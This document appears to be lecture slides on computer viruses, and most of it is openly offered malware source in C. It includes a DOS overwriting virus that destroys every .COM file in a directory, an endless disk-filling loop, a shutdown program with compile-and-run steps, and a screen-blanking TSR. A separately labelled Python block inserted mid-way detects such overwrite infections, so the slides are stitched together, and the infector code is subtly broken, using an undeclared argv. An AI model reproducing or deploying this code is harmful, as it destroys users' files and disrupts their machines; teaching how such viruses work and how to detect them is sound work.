Attaches itself to a program or file leaving infections as it travels.

Usually attached to an executable file (.exe)

Cannot spread without human action (such as running an infected program) to keep it going.

Some basic steps of a source code virus:

1. Find a file to infect, be it an executable, source, or whatever. (If none is found, go to step 3.)

2. Place virus in file.

3. Decide if any activation routines are met and, if so, activate.

4. Return to host or terminate and return to DOS.

Infections destroy the programs and cannot be cured.

FOR EDUCATIONAL PURPOSES ONLY, DO NOT RELEASE!

Simple overwriting virus

Virus Code # 1

It will infect all .COM files in the current directory.

STEPS:

1. Finds all ".COM" files in the specified directory using findfirst().

2. Opens virus file in read-only mode.

3. Opens host file (the file found by findfirst()) in read & write mode.

4. Reads a block of data of 256 bytes.

5. Writes the block into the host file.

6. Repeats 4 and 5 until the whole virus code is copied.

7. Closes virus and host file.

8. Selects the next file in the searched list and goes to step 2.

9. Returns when all searched files have been infected.

#include <stdio.h>
#include <dos.h>                  /* Pre-processor Directives */
#include <dir.h>

FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;               /* Information about searched files */

main()
{
    done = findfirst("*.COM",&ffblk,0);          /* Find a .COM file */
    while (!done)                                /* Loop for all COM's in DIR */
    {
        printf("Infecting %s\n", ffblk.ff_name); /* Inform user */
        Virus=fopen(argv[0],"rb");               /* Open infected file */
        Host=fopen(ffblk.ff_name,"rb+");         /* Open new host file */

        x=9504;                                  /* Virus size - must be correct for */

        while (x>256)                            /* OVERWRITE new Host */
        {                                        /* Read/Write 256 byte */
            fread(buff,256,1,Virus);             /* chunks until bytes */
            fwrite(buff,256,1,Host);             /* left < 256 */
            x-=256;
        }
        fread(buff,x,1,Virus);                   /* Finish off copy */
        fwrite(buff,x,1,Host);
        fcloseall();                             /* Close both files and */
        done = findnext(&ffblk);                 /* go for another one. */
    }
                                                 /* Activation would go */
                                                 /* here */
    return (0);                                  /* Terminate */
}
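An overwriting infector of this kind leaves a recognizable trace: every file it touches no longer matches its recorded hash and starts with the same leading block (9504 bytes in the listing above). The following added example, not part of the original slides, is a defender-side integrity check that flags such files; the function names, the `.com` filter and the sample files are assumptions constructed for illustration.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

PREFIX_LEN = 9504  # body size stated in the listing; an assumption for other samples


def prefix_digest(path, n=PREFIX_LEN):
    """SHA-256 of the first n bytes of a file."""
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read(n)).hexdigest()


def snapshot(directory, ext=".com"):
    """Map file name -> full-file SHA-256 for every file with the extension."""
    out = {}
    for name in sorted(os.listdir(directory)):
        if name.lower().endswith(ext):
            with open(os.path.join(directory, name), "rb") as fh:
                out[name] = hashlib.sha256(fh.read()).hexdigest()
    return out


def suspicious(directory, baseline, ext=".com", n=PREFIX_LEN):
    """Files changed since baseline that now share an identical leading block."""
    current = snapshot(directory, ext)
    changed = [f for f, h in current.items() if baseline.get(f) not in (None, h)]
    groups = defaultdict(list)
    for name in changed:
        groups[prefix_digest(os.path.join(directory, name), n)].append(name)
    return sorted(f for g in groups.values() if len(g) > 1 for f in g)


def demo():
    """Constructed sample: three harmless files, two later get the same header."""
    with tempfile.TemporaryDirectory() as d:
        for name, fill in (("A.COM", b"a"), ("B.COM", b"b"), ("C.COM", b"c")):
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(fill * 12000)
        base = snapshot(d)
        for name in ("A.COM", "B.COM"):          # simulate the overwrite effect
            with open(os.path.join(d, name), "r+b") as fh:
                fh.write(b"Z" * PREFIX_LEN)      # inert filler bytes, not code
        return suspicious(d, base)


if __name__ == "__main__":
    print(demo())
```

A single changed file is not flagged, since an ordinary update also changes the hash; it is the shared leading block across several changed files that marks the overwrite pattern.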

A self growing file.

Virus Code # 2

//START v.c
#include<stdio.h>
#include<stdlib.h>
void main()
{
    while(1)
    {
        system("dir>>╚a.exe");
    }
}
//END

Shut Down Program

Virus Code # 3

void main (void)
{
    system("shutdown -s");
}

• Save the above file as close.c.

• Compile (ALT + F9).

• Close the Turbo C compiler.

• Open the directory containing close.c in Windows (default directory c:\tc\bin).

• Open its exe file (close.exe).

• After some time your Windows operating system will shut down.

TSR Program

• has a timer interrupt

• selects a random row and column position at each run

• writes a space at that position

• terminates, but stays resident.

#include"dos.h"                   /* Pre-processor Directives */
#include<conio.h>
#include<stdlib.h>

void interrupt (*prevtimer)();
void interrupt mytimer();
void writechar(char ch,int row,int col,int attr);

char far* scr;
int a,b;

void main()
{
    scr=(char far*) 0xb8000000;
    prevtimer=getvect(8);
    setvect(8,mytimer);
    keep(0,1000);
}

void interrupt mytimer()
{
    a=random(25);
    b=random(80);
    writechar(' ',a,b,0);
    (*prevtimer)();
}

void writechar(char ch,int row,int col,int attr)
{
    *(scr+row*160+col*2)=ch;
    *(scr+row*160+col*2+1)=attr;
}

THANK YOU